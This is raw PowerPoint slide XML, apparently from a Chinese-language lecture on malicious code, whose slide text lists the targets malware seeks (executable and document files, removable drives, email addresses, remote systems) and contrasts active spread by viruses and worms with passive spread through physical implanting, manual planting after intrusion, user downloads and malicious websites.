          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="745331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sp>
        <p:nvSpPr>
          <p:cNvPr id="284686" name="AutoShape 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC0DD35F-CDC7-4476-9050-EBF30902468C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3227388" y="2454275"/>
            <a:ext cx="5010150" cy="2668588"/>
          </a:xfrm>
          <a:prstGeom prst="horizontalScroll">
            <a:avLst>
              <a:gd name="adj" fmla="val 12500"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="12700" cap="sq">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ct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Char char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>寻找目标</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本地文件（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.exe,.scr,.doc,vbs</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>）</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可移动存储设备</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电子邮件地址</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远程计算机系统</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284687" name="AutoShape 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F1BB601-2EB3-40E0-B4FB-FA7735808D87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1692275" y="3500438"/>
            <a:ext cx="1079500" cy="576262"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 46832"/>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4640" name="Line 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BFEB6A4-2ABA-45D5-AC84-83FE470F0C1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2124075" y="0"/>
            <a:ext cx="0" cy="1916113"/>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hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animClr clrSpc="rgb" dir="cw">
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="6" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="284682"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <a:schemeClr val="bg1"/>
                                      </p:to>
                                    </p:animClr>
                                    <p:animClr clrSpc="rgb" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="284682"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <a:schemeClr val="bg1"/>
                                      </p:to>
                                    </p:animClr>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="284682"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.type</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="solid"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="284682"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.on</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="true"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="10" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="11" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -2.5E-6 -4.33526E-6 L -0.00017 0.40671 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="284682"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="20300"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="13" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="14" presetID="55" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="284687"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="284687"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="284687"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="284687"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="19" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="20" presetID="12" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="284686">
                                            <p:bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="284686">
                                            <p:bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="23" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="4000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="24" presetID="12" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="284686">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="284686">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284686">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="284686">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>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284686">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="284686">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>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284686">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="284686">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>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84686">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="284686">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>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84686">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="51" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28468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82" grpId="0" animBg="1"/>
      <p:bldP spid="284682" grpId="1" animBg="1"/>
      <p:bldP spid="284686" grpId="0" build="allAtOnce" animBg="1"/>
      <p:bldP spid="284687"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5650" name="AutoShape 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD8701F8-2BEA-4B77-893B-F23B96D443CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="612775" y="117475"/>
            <a:ext cx="863600" cy="1439863"/>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寻找目标</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155651" name="AutoShape 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC524EF9-C1FC-4C5B-B38F-5EC02251CAC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="284480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155652" name="AutoShape 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{731CD888-C831-4730-878D-991232B44447}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="536575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5653" name="AutoShape 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E954F5DB-931C-4D18-802C-6611A45E43D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7453313"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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="155654" name="AutoShape 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA3C1544-3709-4BA8-A4A0-05FE16F7AD7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="155650" idx="3"/>
            <a:endCxn id="155651" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1476375" y="836613"/>
            <a:ext cx="1368425" cy="1587"/>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5655" name="AutoShape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{234D7DD4-DA1D-4EAB-ABFB-F6530D43AD5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="155651" idx="3"/>
            <a:endCxn id="155652" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3708400" y="836613"/>
            <a:ext cx="1657350"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5656" name="AutoShape 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35EC164B-8C39-4D16-8F72-93743E70DE3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="155652" idx="3"/>
            <a:endCxn id="155653" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6229350" y="836613"/>
            <a:ext cx="1223963"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sp>
        <p:nvSpPr>
          <p:cNvPr id="155657" name="Line 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28E4F1A3-492E-4659-80C8-34CB67CECCA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4500563" y="-100013"/>
            <a:ext cx="0" cy="2016126"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">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5706" name="AutoShape 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBE7FA7E-1C3F-44E8-A7F2-EB1592469256}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="284321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155659" name="AutoShape 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BAF55AF-5575-4F07-A698-1DFFCA0407C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="536416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5660" name="AutoShape 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4553ED49-0C46-4613-8D84-151BE3C57F3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="745331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sp>
        <p:nvSpPr>
          <p:cNvPr id="285709" name="AutoShape 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F881A6A-1E82-4F21-9D7D-F80DBB93C0D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3333750" y="1839913"/>
            <a:ext cx="4325938" cy="3757612"/>
          </a:xfrm>
          <a:prstGeom prst="horizontalScroll">
            <a:avLst>
              <a:gd name="adj" fmla="val 8644"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="12700" cap="sq">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ct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Char char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>主动型</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>—</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>程序自身实现</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病毒，蠕虫</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>被动型</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>人为实现</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物理接触植入</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入侵之后手工植入</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用户自己下载</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>（姜太公钓鱼）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>访问恶意网站</a:t>
            </a:r>
          </a:p>
          <a:p>
